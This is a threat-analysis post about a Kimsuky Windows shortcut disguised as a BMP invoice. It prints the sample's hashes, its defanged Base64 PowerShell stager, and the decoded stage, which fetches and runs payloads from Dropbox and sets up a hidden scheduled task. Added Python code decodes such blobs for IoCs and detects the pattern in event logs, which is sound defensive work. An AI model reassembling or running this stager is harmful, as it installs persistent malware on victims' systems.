lazarusholic


Kimsuky malware disguised as an invoice for the Expressway Route 29 Sejong-Anseong construction project: 도x기업 20240610 송장.bmp.lnk ("Do-x Enterprise 20240610 invoice.bmp.lnk", 2024.7.30)

2024-08-26, Sakai
http://wezard4u.tistory.com/429261
#Kimsuky #LNK

Contents

Today we look at a piece of Kimsuky malware that disguises itself as an invoice for the Expressway Route 29 Sejong-Anseong construction project: 도x기업 20240610 송장.bmp.lnk (2024.7.30). It is delivered inside an archive, where the file poses as a BMP image but is in fact an LNK (Windows shortcut) file.
The hash values of the archive are as follows:
File name: 1.zip
Size: 6.14 KB
MD5: 4ac2192b01fce9e793f544d09877d16b
SHA-1: d83f47dfe20c38ccec3b9869f644fd4c128a94d0
SHA-256: 3d3cc980ccf97cde5f3272fdc4c88569b77afe3f88e2e62186861daae99644d0
Hash values of the malware itself:
File name: 도양기업 20240610 송장 갑지.bmp.lnk ("Doyang Enterprise 20240610 invoice cover sheet.bmp.lnk")
Size: 310 KB
MD5: 09b1213c8a336541a4849d65b937293f
SHA-1: 9e6e4ecaea18171e2266899f1bffda5de1091a2f
SHA-256: 44ff60d352169f280801cf2075295aab0a6151ff8f77b66d16c82776efce7fea
Malware content (parsed LNK StringData; the Base64 blob below is defanged with (x) markers and wrapped across lines)
StringData
{
namestring: Type: BMP File
Size: 358 KB
Date modified: 04/20/2024 11:23
relativepath: not present
workingdir: not present
commandlinearguments:
-windowstyle hidd(e)n -nop -NoProfile -NonInteractive
-ExecutionPolicy Bypass -c "$ss =\"JGhoaCA9IEpvaW4tUGF0aCA
oW1N5c3RlbS5JTy5QY(X)RoX()To6R2V0VGVtcFBhdGgoKSkgIuuPhOyWkeq4sOyX(h)SAyMD
I0MDYwOCDshqHsnqUg6rCR7KeALmJtcCI7IHdnZXQgLVVyaSAiaHR0c
HM6Ly9kbC5kcm9wYm94dXNlcmNvbnRlbnQuY29tL3NjbC9m(a)(S)9xdW82M3Ft
OGQzaXFsaG1weWliN3AvMjAyNDA(2)MDguYm1wP3Jsa2V5PXNicGNndWJnaTBpeG
l5bm01bGJzbnE4MXAmc3Q9eWxkYnNyb3UmZGw9MCIgLU91dEZpb(G)UgJGhoaDsg
JiAkaGhoOyAkcHBw(I)D0gSm9pbi1QYXRoICgkZW52OkFwcERhdG(E)pICJjaHJv
bWUucHMxIjsgJHN0ciA9ICckYWFhID0gSm9pbi1QYXRoICgkZW52OkFwcERhdGEp
ICJ0ZW1wLnBzMS(I)7IHdnZXQgLVVyaSAiaHR0cHM6Ly9kbC5kcm9wYm94dXNlcm
NvbnRlbnQuY29(t)L3NjbC9maS82dzkwdGxybndtajgzNTM3ZTltZDcvMDYxMHNh
ZmUteC50eHQ/cmxrZXk9ZDZjZWR2dGVvazNreWVwbmZweHRuM2k5aSZzdD15YjRq
endzMCZkbD0wIiAtT3V0RmlsZSAkYWFhOyAmIC(R)hYWE7IFJlbW92ZS1JdGVtIC
1QYXRoICRhYWEgLUZvcmNlOyc7ICRzdHIgfCBPdXQtRmlsZSAtRmlsZVBhdGggJH
BwcCAtRW5jb2RpbmcgVVRGODsgJGFjdGlvbiA9IE5ldy1TY2hlZHVsZWRUYXNrQ(
W(N)0a(W)9uIC1FeGVjdXRlICdQb3dlclNoZWxsLmV4ZScgLUFyZ3VtZW50ICctV2lu
ZG93U3R5bGUgSGlkZGVuIC1ub3AgIC1Ob25JbnRlcmFjdGl2ZSAtTm9Qcm9maWxl
IC1FeGVjdXRpb25Qb2xpY3kg(Q)nlwYXNzIC1Db21tYW5kICImIHskYWJjID0gSm
9pbi1QYXRoICgkZW52OkFwcERhdGEpIFwiY2hyb21lLnBzMVwiOyAmICRhYmM7fS
InOyAkdHJpZ2dlciA9IE5ldy1TY2hlZHVsZWRUYXNrVHJpZ2(d)lciAtT25jZSAt
QXQgKEdldC1EYXRlKS5BZGRNaW51dGVzKDUpIC1SZ(X)BldGl0aW9uSW50ZXJ2YWwgK
E5ldy1UaW1lU3BhbiAtTWludXRlcyAzMCk7ICRzZXR0a(W)5ncyA9IE5ldy1TY2hlZH
VsZWRU(Y)XNrU2V0dGluZ3NTZXQgLUhpZGRlbjsgUmVnaXN0ZXItU2NoZWR1bGVkV
GFzayAtVGFza05hbWUgIkNocm9tZVVwZGF0ZUNvcmVUYXNrTWFjaGluZUtPUiIgLUFjdGl
vbiAkYWN0aW9uIC1Uc(m)lnZ2VyICR0cmlnZ2VyIC1TZXR0aW5ncyAkc2V0dGluZ3M7ICA
kYWFhID0gSm9pbi1QYXRoICgkZW52OkFwcERhdGEpICJzeXN0ZW1fZmlyc3QucHMxIjsgd
2dldCAtVXJpICJodHRwczovL2RsLmR(y)b3Bib3h1c2VyY29udGVudC5jb20vc2NsL2ZpL
3M3ZDZhd2lkNTh4cjg5aHR(s)bnl5Yy8wNjEwc(20)FmZS1mLnR4dD9ybGtleT1lcXhiY2
gyMW5pbGhnd29ydHl3MHhiYmk5JnN0PXd3Y3RzeWIyJm(R)sPTAiIC1PdXRGaWxlICRhYW
E7ICYgJGFhYTsgUmVtb3ZlLUl0ZW0gLVBhdGggJGFhYSAt(0)Rm9yY2U7\"; $aa =
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64
String($ss));$cc = $env:appdata;$dd = \"user(.)ps1\";$ee = Join-Pat
h $cc $dd;$aa | Out-File -FilePath $ee; $aaaaa= 898(9)7878; & $ee;
Remove-Item -Path $ee -Force;"
iconlocation: %SystemRoot%\system32\imageres(.)dll
}
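The command line above hands the next stage to PowerShell as a Base64 blob, which the write-up has defanged with (x) markers and wrapped across lines. The following Python script is an added example, not code from the original post: it reverses that defanging, decodes the blob the same way the LNK does ([System.Convert]::FromBase64String followed by UTF-8 decoding), and extracts the download URLs, dropped file names and scheduled-task name for an IoC list. The embedded blob is a constructed stand-in with the same shape as the real stager; its URL, file names and task name are placeholders, not values from the sample.

```python
import base64
import re

# Constructed sample stager, NOT the real payload from the LNK: it only mirrors
# its shape (cloud-storage download, Join-Path drop into AppData, scheduled
# task registration). URL, file names and task name are placeholders.
SAMPLE_PLAINTEXT = (
    '$hhh = Join-Path ([System.IO.Path]::GetTempPath()) "invoice.bmp"; '
    'wget -Uri "https://example.invalid/scl/fi/abc123/20240608.bmp?rlkey=X&dl=0" '
    '-OutFile $hhh; & $hhh; '
    '$ppp = Join-Path ($env:AppData) "chrome.ps1"; '
    'Register-ScheduledTask -TaskName "ExampleUpdateTask" -Action $action -Trigger $trigger;'
)


def constructed_blob() -> str:
    """Base64-encode the sample, then apply the same kinds of defanging the
    write-up uses: single characters wrapped as (e), empty () markers and hard
    line wraps. The result is what a reader would copy out of the post."""
    b64 = base64.b64encode(SAMPLE_PLAINTEXT.encode("utf-8")).decode("ascii")
    out = []
    for i, ch in enumerate(b64):
        if i % 23 == 7:
            out.append(f"({ch})")      # e.g. "hidd(e)n"
        elif i % 41 == 3:
            out.append(ch + "()")      # e.g. "YX()To6"
        else:
            out.append(ch)
        if i % 60 == 59:
            out.append("\n")           # line wrap as in the post
    return "".join(out)


def refang(blob: str) -> str:
    """Undo the defanging: unwrap (c) / (cc) groups, drop empty () markers and
    strip every whitespace character and line break."""
    joined = re.sub(r"\(([^()]*)\)", r"\1", blob)
    return re.sub(r"\s+", "", joined)


def decode_stage(b64: str) -> str:
    """Mirror the LNK's own decode step (FromBase64String + UTF8.GetString).
    Padding is restored in case the copied blob lost its trailing '='."""
    b64 += "=" * (-len(b64) % 4)
    return base64.b64decode(b64).decode("utf-8")


URL_RE = re.compile(r"""https?://[^\s"']+""")
TASK_RE = re.compile(r'-TaskName\s+"([^"]+)"')
DROP_RE = re.compile(r'Join-Path\s+\((.+?)\)\s+"([^"]+)"')


def extract_iocs(script: str) -> dict:
    """Pull network and host artefacts out of the decoded PowerShell text:
    download URLs, scheduled-task names and (base directory, file name) pairs
    built with Join-Path."""
    return {
        "urls": URL_RE.findall(script),
        "task_names": TASK_RE.findall(script),
        "dropped_files": DROP_RE.findall(script),
    }


def triage(blob: str) -> dict:
    """Full pipeline: defanged blob -> clean Base64 -> script -> IoC dict."""
    return extract_iocs(decode_stage(refang(blob)))


if __name__ == "__main__":
    for key, values in triage(constructed_blob()).items():
        print(key, values)
```

Feed `triage()` the blob copied from an analysis post (or the raw value read from the LNK's command-line arguments) and it returns the URLs to block, the file names to hunt for under %TEMP% and %AppData%, and the task name to look up in the Task Scheduler library.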
Base64-decoded content (defanged; truncated in the original)
$hhh = Join-Path ([System.IO.Path]::GetT(e)mpPath())
"도양기업 2(0)240608 송장 갑지(.)bmp"; wget -Uri "hxxps:/
/dl.dropboxusercontent(.)com/scl/fi/quo63qm8d3iqlhmpyib7p/2
0240608(.)bmp?rlkey=sbpcgubgi0ixiynm(5)lbsnq81p&st=yldbsrou
&dl=0" -OutFile $hhh; & $hhh; $ppp = Join-Path ($env(:AppDat
a) "chrome(.)ps1"; $str = '$aaa = Join-Path ($env:(A)ppData)
"temp(.)ps1"; wget -Uri "hxxps://dl(.)dropboxusercontent(.)co
m/scl/fi/6w90tlrnwmj83537e9md7/0610saf(e)-x(.)txt?rlkey=d6cedv
teok3kyepnfpxtn3i9i&st=yb4jzws0&dl=0" -OutFile $aaa; & $aaa; Rem
ove(-)Item -Path $aaa -Force;'; $str | Out-File -F(i)lePath $ppp
-Encoding U(T)F8; $action = New-Sch(e)duledTaskAction -Execute 'P
owerShell(.)exe' -Argument '-WindowStyle Hi(d)den -nop -NonIntera
ctive -No(P)rofile -Execution(P)olicy Bypass -Command "& {$abc (=)
Join-Path ($env:AppData) \"chrome(.)ps1\"; & $abc;}"'; $trigger …
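The decoded stager shows three behaviours a defender can hunt for: a hidden PowerShell process launched with -ExecutionPolicy Bypass that decodes Base64 inline, a .ps1 written under %AppData%, and a hidden scheduled task whose action runs that script. Below is an added example (not from the original post) of those checks as rules over constructed, simplified Sysmon Event 1/11 and Windows Security Event 4698 records. The field names, paths, user name and the task name are assumptions chosen for the sample; the XML is reduced to the elements the rules need and omits the real Task Scheduler namespace.

```python
import re
from html import unescape

# Constructed sample events (not real logs), reduced to the fields the rules use.
SAMPLE_EVENTS = [
    {"id": 1, "source": "Sysmon", "event_id": 1,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": ('powershell.exe -windowstyle hidden -nop -NoProfile -NonInteractive '
                      '-ExecutionPolicy Bypass -c "$ss = \\"<base64 stage>\\"; '
                      '$aa = [System.Text.Encoding]::UTF8.GetString('
                      '[System.Convert]::FromBase64String($ss)); & $ee"')},
    {"id": 2, "source": "Sysmon", "event_id": 1,          # benign admin script
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"},
    {"id": 3, "source": "Security", "event_id": 4698,
     "task_name": r"\ExampleUpdateTask",                  # placeholder task name
     "task_content": ('<Task><Settings><Hidden>true</Hidden></Settings><Actions><Exec>'
                      '<Command>PowerShell.exe</Command><Arguments>-WindowStyle Hidden -nop '
                      '-NonInteractive -NoProfile -ExecutionPolicy Bypass -Command "&amp; {$abc = '
                      'Join-Path ($env:AppData) \\"chrome.ps1\\"; &amp; $abc;}"</Arguments>'
                      '</Exec></Actions></Task>')},
    {"id": 4, "source": "Security", "event_id": 4698,     # benign backup task
     "task_name": r"\NightlyBackup",
     "task_content": ('<Task><Settings><Hidden>false</Hidden></Settings><Actions><Exec>'
                      '<Command>C:\\Program Files\\Backup\\backup.exe</Command>'
                      '<Arguments>/daily</Arguments></Exec></Actions></Task>')},
    {"id": 5, "source": "Sysmon", "event_id": 11,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "target_filename": r"C:\Users\victim\AppData\Roaming\chrome.ps1"},
]

POWERSHELL_RE = re.compile(r"(^|\\)powershell\.exe$", re.I)
HIDDEN_RE = re.compile(r"-w(indowstyle)?\s+hidd?en", re.I)
BYPASS_RE = re.compile(r"-e(xecutionpolicy)?\s+bypass", re.I)
B64_RE = re.compile(r"FromBase64String|-enc(odedcommand)?\b", re.I)
# A .ps1 referenced via $env:AppData or living under AppData\Roaming.
APPDATA_PS1_RE = re.compile(r"\$env:appdata.{0,60}?\.ps1|\\AppData\\Roaming\\[^\\\s\"']+\.ps1", re.I)


def rule_hidden_bypass_base64(ev):
    """Process creation: hidden window + policy bypass + inline Base64 decode."""
    if ev.get("event_id") != 1:
        return None
    cl = ev.get("command_line", "")
    if (POWERSHELL_RE.search(ev.get("image", "")) and HIDDEN_RE.search(cl)
            and BYPASS_RE.search(cl) and B64_RE.search(cl)):
        return "hidden_bypass_base64_powershell"
    return None


def rule_hidden_task_powershell_appdata(ev):
    """Task creation: hidden task whose action is PowerShell running a .ps1 in AppData."""
    if ev.get("event_id") != 4698:
        return None
    xml = ev.get("task_content", "")
    hidden = re.search(r"<Hidden>\s*true\s*</Hidden>", xml, re.I)
    cmd = re.search(r"<Command>([^<]*)</Command>", xml)
    args = re.search(r"<Arguments>([^<]*)</Arguments>", xml)
    if not (hidden and cmd and args):
        return None
    arguments = unescape(args.group(1))       # &amp; -> & etc.
    if (re.search(r"powershell(\.exe)?$", cmd.group(1).strip(), re.I)
            and BYPASS_RE.search(arguments) and APPDATA_PS1_RE.search(arguments)):
        return "hidden_task_runs_appdata_ps1"
    return None


def rule_ps1_dropped_in_appdata(ev):
    """File creation: PowerShell itself writes a .ps1 under AppData\\Roaming."""
    if ev.get("event_id") != 11:
        return None
    if (POWERSHELL_RE.search(ev.get("image", ""))
            and APPDATA_PS1_RE.search(ev.get("target_filename", ""))):
        return "powershell_writes_appdata_ps1"
    return None


RULES = [rule_hidden_bypass_base64, rule_hidden_task_powershell_appdata, rule_ps1_dropped_in_appdata]


def run_rules(events):
    """Return (event id, rule name) for every event that trips a rule."""
    hits = []
    for ev in events:
        for rule in RULES:
            name = rule(ev)
            if name:
                hits.append((ev["id"], name))
    return hits


if __name__ == "__main__":
    for event_id, rule_name in run_rules(SAMPLE_EVENTS):
        print(event_id, rule_name)
```

On the sample, events 1, 3 and 5 trip one rule each while the two benign records stay quiet. Each rule alone will produce some false positives in an environment with heavy PowerShell automation; correlating them by host and time window (process, then dropped file, then task, all within minutes) is what makes the chain described in the post stand out.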

IoC

09b1213c8a336541a4849d65b937293f
3d3cc980ccf97cde5f3272fdc4c88569b77afe3f88e2e62186861daae99644d0
44ff60d352169f280801cf2075295aab0a6151ff8f77b66d16c82776efce7fea
4ac2192b01fce9e793f544d09877d16b
9e6e4ecaea18171e2266899f1bffda5de1091a2f
d83f47dfe20c38ccec3b9869f644fd4c128a94d0